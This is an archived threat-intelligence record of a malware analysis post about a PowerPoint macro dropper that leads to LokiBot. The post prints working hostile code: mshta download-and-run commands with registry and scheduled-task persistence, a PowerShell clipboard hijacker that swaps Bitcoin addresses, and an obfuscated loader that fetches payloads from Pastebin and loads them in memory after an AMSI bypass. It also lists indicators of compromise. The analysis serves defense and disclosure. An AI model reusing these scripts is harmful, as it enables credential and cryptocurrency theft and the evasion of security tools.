{
	"id": "30b22054-d5e5-4828-b6e8-c087c1d9c356",
	"created_at": "2026-04-06T00:18:00.540673Z",
	"updated_at": "2026-04-10T13:12:32.77972Z",
	"deleted_at": null,
	"sha1_hash": "8b2e60d80968d8c2abc3c225fe545107e9b5572e",
	"title": "A twisted malware infection chain",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 724999,
	"plain_text": "A twisted malware infection chain\r\nPublished: 2020-08-26 · Archived: 2026-04-05 21:03:11 UTC\r\n\r\nRecently, a malware dropper received by mail has caught our attention, as we have detected different samples sent to multiple targets in Spain, Portugal, Italy and Norway, although it has probably reached many more European countries.\r\n\r\nFirstly, it is characteristic that it lands on the victim in PPT format, while it has been much more common to find DOC or XLS extensions being used for this purpose.\r\n\r\nThe document has no content, but when you close the PPT viewer, the following window shows up:\r\n\r\nThis window is generated by the macro contained in the On_Close function, which is executed when the document is closed instead of when it is opened, thus preventing the macro from being executed in many sandbox solutions, which typically open the document but never close it.\r\n\r\nThis macro has the following slightly obfuscated code:\r\n\r\nNote that, before the \"MsgBox\", it executes \"Shell\" with two concatenated variables. If we look at the content of those two variables, we can see that they contain the following string: \"mshta.exe https://j.]mp/kasasjdoopoopasdskdd\", which causes the legitimate Windows interpreter \"mshta\" to execute a script hosted at the web address that follows.\r\n\r\nIn fact, this address only redirects to the following link in Pastebin: https://pastebin.com/mqRZ7CBC, which contains the following obfuscated script:\r\n\r\nAfter cleaning up the script a bit, we can see that it triggers the execution of the following commands:\r\n\r\n'id1\r\nrun mshta.exe \"https://pastebin.com\\raw\\ZnhyvWAU\"\r\nrun schtasks.exe \"C:\\Windows\\System32\\schtasks.exe\" /create /sc MINUTE /mo 60 /tn \"xesefiliym\" /tr \"mshta.exe \"https://pastebin.com\\raw\\ZnhyvWAU\" /F\r\n'id2\r\nrun reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\trats2di => mshta.exe \"https://pastebin.com\\raw\\d7kxMSZd\"\r\n'id3\r\nrun reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ => mshta.exe \"https://pastebin.com\\raw\\VJDyrCD2\"\r\n'defid\r\nrun mshta.exe \"https://pastebin.com\\raw\\9dva5i24\"\r\nrun reg add HKCU\\Software\\Microsoft\\Windows notepad\\CurrentVersion\\Run\\rednefed => mshta.exe \"https://pastebin.com\\raw\\9dva5i24\"\r\n\r\nBasically, the script consists of the execution of two other Pastebin-hosted mshta scripts and the creation of persistence for these two, plus another two, in the registry Run key and in the system's scheduled tasks, so that at every logon (and, for the scheduled task, every 60 minutes) four scripts are downloaded from Pastebin and executed on the computer.\r\n\r\nThe execution of each of the 4 scripts is preceded by one of the following identifiers: \"id1\", \"id2\", \"id3\" and \"defid\".\r\n\r\nSince the script executed by id1 is the most complex, we will leave it for the end of the post and focus first on the other 3, in order of complexity.\r\n\r\nid3 does not run anything; probably the author using this dropper did not need it and left it free, pointing to the following script hosted in Pastebin (the language attribute is simply the string \"VBScript\" encoded as HTML entities):\r\n\r\n<script language=\"&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;\">\r\nself.close\r\n</script>\r\n\r\nid2 consists of a small PowerShell script which runs at every logon and stays in a loop checking everything copied to the Windows clipboard. If the copied string looks like a Bitcoin address, it replaces it with the attacker's Bitcoin address, in order to make the user send money to the actor's wallet:\r\n\r\nfunction isBitcoinAddress([string]$clipboardContent)\r\n{\r\n    if($clipboardContent[0] -ne '1')\r\n    {\r\n        return $false\r\n    }\r\n    $strLength = $clipboardContent.length\r\n    if($strLength -lt 26 -or $strLength -gt 35)\r\n    {\r\n        return $false\r\n    }\r\n    $validRegex = '^[a-zA-Z0-9\\s]+$'\r\n    if($clipboardContent -cnotmatch $validRegex)\r\n    {\r\n        return $false\r\n    }\r\n    return $true\r\n}\r\n$bitcoinAddresses = (\"19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W\",\r\n\"19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W\",lol,\r\n\"19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W\", \"19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W\",\r\n\"19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W\")\r\n$bitcoinAddressesSize = $bitcoinAddresses.length\r\n$i = 0\r\n$oldAddressSet = \"\"\r\nwhile(1)\r\n{\r\n    $clipboardContent = Get-Clipboard\r\n    if((isBitcoinAddress($clipboardContent)) -ceq $true -and\r\n        $clipboardContent -cne $oldAddressSet)\r\n    {\r\n        Set-Clipboard $bitcoinAddresses[$i]\r\n        $oldAddressSet = $bitcoinAddresses[$i]\r\n        $i = ($i + 1) % $bitcoinAddressesSize\r\n    }\r\n}\r\n\r\nNote that the check only catches addresses beginning with \"1\" (the legacy P2PKH format); addresses starting with \"3\" or \"bc1\" pass through the clipboard untouched. In this case, although the script is capable of storing several Bitcoin addresses and rotating through them, the array only contains a single address repeated (19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W), from which it has been possible to identify different sources that did not have much activity:\r\n\r\nDefid, on the other hand, points to another script, which downloads from Pastebin a base64-encoded file that has been reversed and in which the \"0\" characters have been replaced by the \".\" character, in order to make its analysis more difficult:\r\n\r\nAfter reversing the string, restoring the \"0\" characters and base64-decoding it, we obtain a small executable developed in .NET and without obfuscation, whose only purpose is to drop on the system a .vbs file that disables a large number of system security settings, including those of Windows Defender and MS Office.\r\n\r\nFinally, the script executed by id1, after being cleaned up a bit, contains the following relevant commands:\r\n\r\nCreateObject(\"Wscript.Shell\").regwrite \"HKCU\\Software\\Fucku\",\r\n\"$fucksecurityresearchers='contactmeEX'.replace('contactme','I');\r\nsal M $fucksecurityresearchers;\r\ndo {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);\r\n$KDASKDKAs = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);\r\n[System.Net.ServicePointManager]::SecurityProtocol = $KDASKDKAs;\r\n$iwannaleftsellingtools= New-Object -Com Microsoft.XMLHTTP;\r\n$iwannaleftsellingtools.open('GET','https://pastebin.com/raw/n9Zadz2P',$false);\r\n$iwannaleftsellingtools.send();\r\n$ijijinjnini=$iwannaleftsellingtools.responseText;\r\n$asciiChars= $ijijinjnini -split '-' |ForEach-Object {[char][byte]\"\"0x$_\"\"};\r\n$asciiString= $data -join ''|M;\r\n[Byte[]]$Cli2= iex(iex('(&(GCM *W-O*)'+\r\n'Net.WebClient).DownloadString(''https://pastebin.com/raw/UTLkgL5Y'').replace(''/-(+)-\\'','0x')) | g;\r\n$iwannaleftsellingtools=[System.Reflection.Assembly]::Load($decompressedByteArray);\r\n[rOnAlDo]::ChRiS('notepad.exe',$Cli2)\" , \"REG_SZ\"\r\n\r\nThis script first of all leaves some kind words for the analyst reviewing the execution flow of this threat, and informs us that its author would like to change job :). In terms of capabilities, mainly what it does is download two other executables developed in .NET with obfuscation techniques similar to those of the \"Defid\" executable. Once downloaded and deobfuscated, it loads them with \"[System.Reflection.Assembly]::Load(XXX)\", which allows it to call functions within these binaries directly from PowerShell.\r\n\r\nThe first loaded binary is called as follows:\r\n\r\n$blind=[System.Reflection.Assembly]::Load($deblindB)\r\n[Amsi]::Bypass()\r\n\r\nThe names of the class and function being called give clues to its purpose. The binary is obfuscated with ConfuserEx, so using a tool such as \"de4dot-cex\" for the analysis can make its content easier to analyze.\r\n\r\nIt consists of a DLL that does what it promises: it bypasses AMSI to avoid detection, using a version practically identical to this technique: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.\r\n\r\nAfter this, it downloads a third executable from Pastebin, decodes it and stores it in a variable called $Cli2, then loads the second executable, also in .NET, and calls its function \"Chris()\", passing as parameters the string \"notepad.exe\" and the variable containing the third executable.\r\n\r\nThis second binary, analyzed in the same way as the AMSI bypass DLL, is used to inject a non-.NET executable into another process that is not .NET either. That is, it creates a legitimate notepad process and injects the third downloaded binary into it.\r\n\r\nThis last binary is a sample of the bot/stealer LokiBot, practically unpacked, which at this point runs on a system stripped of most of its protection measures.\r\n\r\nIt is interesting that, up to this point, this campaign coincides in many points with the following report related to an AgentTesla infection campaign, but since in this case the final payload is not developed in .NET, they have had to add this last extra loader in order to inject malware developed in other languages into other processes.\r\n\r\nThe sample's command and control server is \"http://195.69.140.]147/.op/cr.php/Gi4uJRts3jTJM\" and, although its main function is to act as a stealer, focusing on stealing credentials from all types of mail clients, FTP clients, browsers and many other services, it also acts as a bot, allowing the actor behind this threat some control over the computer.\r\n\r\nIOCs\r\nhttp://195.69.140.]147/.op/cr.php/Gi4uJRts3jTJM\r\nhttps://j.mp/kasasjdoopoopasdskdd\r\nhttps://pastebin.com/raw/ZnhyvWAU\r\nhttps://pastebin.com/raw/d7kxMSZd\r\nhttps://pastebin.com/raw/VJDyrCD2\r\nhttps://pastebin.com/raw/9dva5i24\r\nhttps://pastebin.com/raw/n9Zadz2P\r\nhttps://pastebin.com/raw/XCXpMvQC\r\nhttps://pastebin.com/raw/UTLkgL5Y\r\n\r\nSource: https://lab52.io/blog/a-twisted-malware-infection-chain/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://lab52.io/blog/a-twisted-malware-infection-chain/"
	],
	"report_names": [
		"a-twisted-malware-infection-chain"
	],
	"threat_actors": [],
	"ts_created_at": 1775434680,
	"ts_updated_at": 1775826752,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8b2e60d80968d8c2abc3c225fe545107e9b5572e.pdf",
		"text": "https://archive.orkl.eu/8b2e60d80968d8c2abc3c225fe545107e9b5572e.txt",
		"img": "https://archive.orkl.eu/8b2e60d80968d8c2abc3c225fe545107e9b5572e.jpg"
	}
}